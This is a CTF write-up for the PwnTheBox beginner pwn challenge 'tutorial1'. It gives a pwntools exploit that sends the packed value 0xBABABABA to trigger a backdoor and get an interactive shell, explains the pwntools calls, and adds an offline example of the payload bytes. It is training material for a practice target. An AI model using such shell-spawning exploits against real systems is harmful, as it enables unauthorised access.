PwnTheBox,Pwn:tutorial1

2022-06-10 23:13:00 Part 02

Analysis: when the value stored in buf is 0xBABABABA (hexadecimal), the backdoor function is called.

The backdoor function executes a command, so system can be used to obtain a shell.

In summary, the payload is 0xBABABABA.

exp:

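from pwn import *
context(log_level='debug')  # print the full I/O exchange while debugging
p = remote('redirect.do-not-trust.hacking.run', 10146)  # challenge server
payload = 0xBABABABA  # value that makes the program call backdoor
p.sendline(p64(payload))  # pack as 8 little-endian bytes, then append \n
p.recv()
p.interactive()  # hand the session over to the terminal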

-context(os='linux', arch='amd64', log_level='debug')

1. os sets the target operating system to linux; most pwn challenges in CTFs run on Linux.
2. arch sets the architecture to amd64, which can simply be thought of as 64-bit mode; the corresponding 32-bit mode is 'i386'.
3. log_level sets the log output level to debug. This is usually set while debugging: pwntools then prints the complete I/O exchange, which makes debugging easier and helps avoid I/O-related errors during a CTF.

-remote : Connects to the remote server.


-sendline(data) : Sends one line of data; equivalent to appending \n to the end of the data.


-recv(numb=number of bytes, timeout=default) : Receives the specified number of bytes.


-interactive() : Used once a shell has been obtained; interacts with it directly, as if working in a shell.
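
The bytes that `p.sendline(p64(payload))` puts on the wire, as an added example that is not part of the original write-up. It uses `struct` instead of pwntools so it runs offline; `check_passes` is a hypothetical model of the target's comparison (the binary's code is not shown on the page), assuming a zero-filled buf read as a little-endian integer of 4 or 8 bytes.

```python
import struct

MAGIC = 0xBABABABA  # value from the write-up


def p64(value: int) -> bytes:
    """8-byte little-endian packing, what pwntools' p64 does by default."""
    return struct.pack("<Q", value)


def p32(value: int) -> bytes:
    """4-byte little-endian packing, what pwntools' p32 does by default."""
    return struct.pack("<I", value)


def sendline_bytes(data: bytes) -> bytes:
    """What sendline(data) transmits: the data followed by a newline."""
    return data + b"\n"


def check_passes(wire: bytes, width: int = 4) -> bool:
    """Hypothetical model of the check (assumption, not the real binary):
    the first `width` bytes of a zero-filled buf are compared to MAGIC."""
    buf = wire[:width].ljust(width, b"\x00")
    return int.from_bytes(buf, "little") == MAGIC


if __name__ == "__main__":
    candidates = {
        "p64(MAGIC)": p64(MAGIC),
        "p32(MAGIC)": p32(MAGIC),
        "ASCII text": b"0xBABABABA",  # the digits typed as characters
    }
    for name, data in candidates.items():
        wire = sendline_bytes(data)
        print(f"{name:12} {wire.hex(' '):32} "
              f"4-byte compare: {check_passes(wire, 4)!s:5} "
              f"8-byte compare: {check_passes(wire, 8)}")
```

Under this model `p64` satisfies both compare widths because its upper four bytes are zero, while `p32` followed by the newline fails an 8-byte compare: the `\n` lands in the fifth byte.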

The connection succeeds; list the directory.

Get the flag.
